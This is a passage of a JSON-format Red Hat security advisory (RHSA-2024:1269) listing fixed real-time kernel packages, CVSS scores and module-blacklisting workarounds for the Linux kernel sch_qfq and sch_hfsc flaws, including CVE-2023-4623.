"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "Mitigation for this issue is to skip loading the affected module sch_qfq onto the system until we have a fix available. This can be done by a blacklist mechanism and will ensure the driver is not loaded at the boot time.\n~~~\n How do I blacklist a kernel module to prevent it from loading automatically? \nhttps://access.redhat.com/solutions/41278 \n~~~",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: net/sched: sch_qfq component can be exploited if in qfq_change_agg function happens qfq_enqueue overhead"
},
{
"cve": "CVE-2023-4623",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-09-06T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2237757"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the Linux kernel\u0027s net/sched: sch_hfsc (HFSC qdisc traffic control) component that can be exploited to achieve local privilege escalation. If a class with a link-sharing curve, for example, with the HFSC_FSC flag set, has a parent without a link-sharing curve, then init_vf() will call vttree_insert() on the parent, but vttree_remove() will be skipped in update_vf(). This leaves a dangling pointer that can cause a use-after-free issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: net/sched: sch_hfsc UAF",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-4623"
},
{
"category": "external",
"summary": "RHBZ#2237757",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2237757"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-4623",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4623"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-4623",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4623"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f"
}
],
"release_date": "2023-09-06T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent the module sch_hfsc from being loaded by blacklisting the module to prevent it from loading automatically. \n~~~\nhttps://access.redhat.com/solutions/41278 \n~~~",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: net/sched: sch_hfsc UAF"
},
{
"cve": "CVE-2023-4921",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
